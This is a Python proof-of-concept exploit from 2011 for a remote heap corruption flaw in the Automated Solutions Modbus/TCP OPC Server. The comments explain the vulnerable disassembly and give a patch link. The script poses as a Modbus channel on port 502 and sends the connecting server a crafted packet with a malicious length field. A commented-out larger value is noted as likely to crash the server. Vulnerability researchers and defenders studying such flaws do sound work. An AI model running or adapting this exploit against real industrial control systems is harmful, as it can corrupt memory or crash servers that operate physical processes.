#!/usr/bin/python
# asmb-heap.py
# Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
# Jeremy Brown [0xjbrown41-gmail-com]
# Jan 2011
#
# A specially crafted length field in a MODBUS packet header can trigger heap corruption.
#
# 00408312 |> 8B5424 3C MOV EDX,DWORD PTR SS:[ESP+3C] -> move length into edx
# 00408316 |. 53 PUSH EBX -> push src onto stack
# 00408317 |. 8B5C24 3C MOV EBX,DWORD PTR SS:[ESP+3C] -> move dest into ebx
# 0040831B |. 8BCA MOV ECX,EDX -> move length into ecx
# 0040831D |. 55 PUSH EBP -> push ebp onto stack
# 0040831E |. 8BE9 MOV EBP,ECX -> move ecx into ebp
# 00408320 |. 57 PUSH EDI -> push edi onto stack
# 00408321 |. 33C0 XOR EAX,EAX -> eax = 0
# 00408323 |. 8BFB MOV EDI,EBX -> move dest into edi
# 00408325 |. 895C24 1C MOV DWORD PTR SS:[ESP+1C],EBX -> move ebx into dword at esp+1c
# 00408329 |. C1E9 02 SHR ECX,2 -> shift ecx right twice
# 0040832C |. F3:AB REP STOS DWORD PTR ES:[EDI] -> fill ecx dwords at edi with eax
#
# So basically memset(edi,eax,ecx). We control ecx, so we have control over the number of dwords
# it writes in the heap buffer. But, as you can see, the dwords themselves are not controllable,
# they are NULL. However, we can still write past the bounds of the allocated chunk of memory.
#
# Although it seems unlikely code execution could result, it is still possible to write data
# past the memory allocated on a heap (0x350000) available in the server process.
#
# This code works by setting up a fake channel and accepting a connection. To trigger this
# vulnerability, the server simply needs to initiate communication (monitor mode would be ideal)
# with this fake channel and the results depend on the response you choose.
#
# I tested version 3 running on Windows. Testing the server with this code and its default
# response should't cause the server to crash (immediately anyways). Larger lengths (such as
# the one commented out) may cause the server to crash.
#
# Patch: http://automatedsolutions.com/demos/demoform.asp?code=17
#
import sys
import socket
port=502
# [trans] [prot] [len] [u] [f] [bc] [data]
resp="\x00\x00"+"\x00\x00"+"\x02\x01"+"\x00"+"\x03"+"\x02"+"\x00\x00" # break @ 40832c, dump edi, keep hitting f9 and watch (debug)
#resp="\x00\x00"+"\x00\x00"+"\x02\xb0"+"\x00"+"\x03"+"\x02"+"\x00\x00" # Heap block at 0035F2D0 modified at 0035F4E7 past requested size of 20f
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.bind(("",port))
sock.listen(1)
conn,addr=sock.accept()
except IOError,e:
print e
print "OPC server at %s connected\n"%addr[0]
req=conn.recv(32)
print "<-- %s"%req.encode("hex")
conn.send(resp)
print "--> %s\n"%resp.encode("hex")
conn.close()
print "finished, check server"